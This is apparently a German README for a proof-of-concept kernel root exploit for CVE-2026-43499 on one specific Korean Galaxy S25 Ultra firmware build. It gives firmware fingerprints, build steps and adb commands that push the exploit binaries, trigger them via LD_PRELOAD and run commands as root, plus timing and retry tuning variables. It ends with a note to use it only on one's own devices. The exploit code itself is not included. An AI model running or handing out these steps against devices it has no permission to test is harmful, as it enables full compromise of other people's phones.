
Eigenständiger PoC für Galaxy S25 Ultra SM-S938N S938NKSUACZF1
Gerätespezifischer Proof of Concept für CVE-2026-43499 auf dem koreanischen Samsung Galaxy S25 Ultra.
Model: SM-S938N
Codename: pa3q
Android: 16 / API 36
Build: S938NKSUACZF1
Display ID: BP4A.251205.006.S938NKSUACZF1
Fingerprint: samsung/pa3qksx/pa3q:16/BP4A.251205.006/S938NKSUACZF1_OKRACZF1:user/release-keys
Kernel: 6.6.98-android15-8-pd6ff1cd-abogkiS938NKSUACZF1-4k
Architecture: arm64 / 4K pages
Die Offsets und Strukturlayouts gelten nur für die oben genannte Firmware.
Dieser Port basiert auf:
b850d3bddc74c3328d5fbcc0568d21962b55d949Die ursprüngliche Apache-Lizenz 2.0 ist in LICENSE enthalten.
pa3q-S938NKSUACZF1.system_unbound_wq-Root-Pfad des User-Mode-Helpers hinzugefügt.Setze ANDROID_NDK_HOME auf Android NDK r29 oder eine kompatible Toolchain:
make -j8
Ausgaben:
build/cve-2026-43499
build/cve-2026-43499-root
adb push build/cve-2026-43499 /data/local/tmp/cve-2026-43499
adb push build/cve-2026-43499-root /data/local/tmp/cve-2026-43499-root
adb shell chmod 755 /data/local/tmp/cve-2026-43499 /data/local/tmp/cve-2026-43499-root
adb shell "LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
adb shell "/data/local/tmp/cve-2026-43499-root -c 'id'"
Der Exploit verwendet standardmäßig 16 unabhängige Versuche und eine Basis-pselect-Verzögerung von 20.000 Mikrosekunden. Überschreibe diese beim Sammeln von Zeitdaten:
adb shell "EXPLOIT_ATTEMPTS=24 PSELECT_DELAY_USEC=20000 LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
Die temporäre Root-Sitzung und die zurückbehaltenen Allokationen bestehen bis zum Neustart.
Für die Ein-Klick-Installation und KernelSU-Unterstützung verwende Root My Galaxy.
Nur auf Geräten verwenden, die dir gehören oder für die du ausdrücklich die Erlaubnis zum Testen hast.